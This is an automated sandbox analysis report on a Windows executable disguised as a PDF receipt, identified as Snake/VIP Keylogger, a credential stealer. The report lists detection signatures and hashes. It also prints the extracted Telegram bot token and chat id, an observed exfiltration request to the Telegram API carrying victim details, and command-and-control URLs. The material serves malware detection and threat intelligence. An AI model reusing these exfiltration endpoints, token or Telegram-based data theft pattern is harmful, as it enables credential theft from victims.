Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rDEKONT-1_15_2025__75kb__pdf.exe

Overview

General Information

Sample name:rDEKONT-1_15_2025__75kb__pdf.exe
Analysis ID:1591553
MD5:eba7ff0d3cb799af22795e1d3c55360c
SHA1:e09436242af4a602b31b40571bebe468c229a4fb
SHA256:701cc76315954f7e5e8b0fb36db44cdb6e6e40384be529670490523be1429d8f
Tags:exeuser-Porcupine
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7946291525:AAFHJlyjrW7RJiLewU0S0ya89C3MpMemoiQ", "Chat id": "7727510436"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7946291525:AAFHJlyjrW7RJiLewU0S0ya89C3MpMemoiQ", "Chat_id": "7727510436", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d6ba:$a1: get_encryptedPassword
        • 0x2d9d3:$a2: get_encryptedUsername
        • 0x2d4d8:$a3: get_timePasswordChanged
        • 0x2d5d3:$a4: get_passwordField
        • 0x2d6d0:$a5: set_encryptedPassword
        • 0x2ed9d:$a7: get_logins
        • 0x2ed00:$a10: KeyLoggerEventArgs
        • 0x2e965:$a11: KeyLoggerEventArgsEventHandler
        00000003.00000002.4501375928.0000000003091000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 12 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2d8ba:$a1: get_encryptedPassword
                  • 0x2dbd3:$a2: get_encryptedUsername
                  • 0x2d6d8:$a3: get_timePasswordChanged
                  • 0x2d7d3:$a4: get_passwordField
                  • 0x2d8d0:$a5: set_encryptedPassword
                  • 0x2ef9d:$a7: get_logins
                  • 0x2ef00:$a10: KeyLoggerEventArgs
                  • 0x2eb65:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 27 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T04:01:59.838451+010028033053Unknown Traffic192.168.2.549709104.21.96.1443TCP
                  2025-01-15T04:02:01.273507+010028033053Unknown Traffic192.168.2.549712104.21.96.1443TCP
                  2025-01-15T04:02:03.911273+010028033053Unknown Traffic192.168.2.549717104.21.96.1443TCP
                  2025-01-15T04:02:05.166137+010028033053Unknown Traffic192.168.2.549719104.21.96.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T04:01:58.177441+010028032742Potentially Bad Traffic192.168.2.549706193.122.6.16880TCP
                  2025-01-15T04:01:59.286838+010028032742Potentially Bad Traffic192.168.2.549706193.122.6.16880TCP
                  2025-01-15T04:02:00.522599+010028032742Potentially Bad Traffic192.168.2.549710193.122.6.16880TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T04:02:09.897310+010018100071Potentially Bad Traffic192.168.2.549726149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: rDEKONT-1_15_2025__75kb__pdf.exeAvira: detected
                  Found malware configuration
                  Source: 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7946291525:AAFHJlyjrW7RJiLewU0S0ya89C3MpMemoiQ", "Chat_id": "7727510436", "Version": "4.4"}
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7946291525:AAFHJlyjrW7RJiLewU0S0ya89C3MpMemoiQ", "Chat id": "7727510436"}
                  Multi AV Scanner detection for submitted file
                  Source: rDEKONT-1_15_2025__75kb__pdf.exeVirustotal: Detection: 27%Perma Link
                  Source: rDEKONT-1_15_2025__75kb__pdf.exeReversingLabs: Detection: 34%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: rDEKONT-1_15_2025__75kb__pdf.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: rDEKONT-1_15_2025__75kb__pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49708 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
                  Source: rDEKONT-1_15_2025__75kb__pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 0147F8E9h3_2_0147F630
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 0147FD41h3_2_0147FA8B
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06D1B3C8h3_2_06D1AFB0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06D1AE01h3_2_06D1AB50
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06D10D0Dh3_2_06D10B30
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06D11697h3_2_06D10B30
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06D1FBA5h3_2_06D1F868
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06D10673
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06D1E9B1h3_2_06D1E708
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06D10040
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06D1E423h3_2_06D1E178
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06D1F261h3_2_06D1EFB8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06D1EE09h3_2_06D1EB60
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06D10853
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06D1D719h3_2_06D1D470
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06D1F6B9h3_2_06D1F410
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06D1B3C8h3_2_06D1B2F6
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06D1DFC9h3_2_06D1DD20
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06D1DB71h3_2_06D1D8C8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBD98Fh3_2_06DBD620
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBDFB8h3_2_06DBDCC0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB5966h3_2_06DB5698
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB7956h3_2_06DB7688
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB3976h3_2_06DB36A8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBE948h3_2_06DBE650
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB990Eh3_2_06DB9640
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBB8FEh3_2_06DBB630
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB10F0h3_2_06DB0E20
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB4296h3_2_06DB3FC8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBF2D8h3_2_06DBEFE0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB6286h3_2_06DB5FB8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB8276h3_2_06DB7FA8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBC21Fh3_2_06DBBF50
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBA22Eh3_2_06DB9F60
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBF7A0h3_2_06DBF4A8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB4726h3_2_06DB4458
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB6716h3_2_06DB6448
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB8706h3_2_06DB8438
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB3056h3_2_06DB2D88
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB9026h3_2_06DB8D58
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB5046h3_2_06DB4D78
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB7036h3_2_06DB6D68
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBAFDEh3_2_06DBAD10
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBCFCEh3_2_06DBCD00
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB9D9Eh3_2_06DB9AD0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBBD8Eh3_2_06DBBAC0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then mov esp, ebp3_2_06DB2AF0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB34E6h3_2_06DB3218
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB54D6h3_2_06DB5208
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBA6BEh3_2_06DBA3F0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBC6AEh3_2_06DBC3E0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB7DE6h3_2_06DB7B18
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBEE10h3_2_06DBEB18
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB3E06h3_2_06DB3B38
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB5DF6h3_2_06DB5B28
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB6BA6h3_2_06DB68D8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB8B96h3_2_06DB88C8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB4BB6h3_2_06DB48E8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBAB4Eh3_2_06DBA880
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBCB3Eh3_2_06DBC870
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB74C6h3_2_06DB71F8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DB948Fh3_2_06DB91E8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBD45Eh3_2_06DBD190
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBE480h3_2_06DBE188
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBB46Eh3_2_06DBB1A0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 4x nop then jmp 06DBFC68h3_2_06DBF970

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49726 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.492e818.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.48a6df8.4.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:414408%0D%0ADate%20and%20Time:%2015/01/2025%20/%2009:17:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20414408%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49709 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49712 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 104.21.96.1:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49708 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:414408%0D%0ADate%20and%20Time:%2015/01/2025%20/%2009:17:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20414408%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 15 Jan 2025 03:02:09 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
